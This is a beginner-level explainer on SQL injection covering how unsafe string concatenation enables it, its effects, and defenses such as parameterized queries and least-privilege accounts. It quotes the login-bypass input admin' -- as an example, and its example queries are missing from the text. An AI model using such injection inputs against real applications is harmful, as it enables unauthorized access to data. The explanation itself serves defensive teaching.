SQL injection is a security vulnerability where an attacker injects malicious SQL code into application input fields (like login boxes or search forms) so that the database executes unintended commands. This can allow attackers to read, modify, or delete data, or even gain full control of the database.
SQL injection typically occurs when an application directly concatenates user input into SQL strings instead of treating it as separate, untrusted data.
How SQL Injection Works
Suppose a login query is built like this (unsafe):
If an attacker enters admin' -- as the username, the query becomes:
The -- comment disables the rest of the query, effectively bypassing the password check.
Common Attack Effects
Data theft:
Attackers can select sensitive data such as passwords or personal information.
Data modification or deletion:
Injected commands can
UPDATEorDELETErecords.
Privilege escalation:
In extreme cases, attackers can execute administrative commands.
How to Prevent SQL Injection
Use parameterized queries / prepared statements:
Let the DBMS treat user input as data, not as part of the SQL code.
Input validation and sanitization:
Reject or clean suspicious characters and patterns in user input.
Least‑privilege database accounts:
Ensure the application’s database user has only the minimal necessary permissions.
Web application firewalls (WAF):
Add an extra layer to detect and block common injection patterns.
For beginners, SQL injection is like an attacker sneaking instructions into a form letter: instead of answering the question, they rewrite the whole sentence to trick the system into doing something it wasn’t supposed to.
Summary
SQL injection in DBMS happens when attackers insert malicious SQL through application inputs, tricking the database into running unintended commands. Defenses such as parameterized queries, input validation, and least‑privilege access are essential to block SQL injection and keep database‑driven applications secure.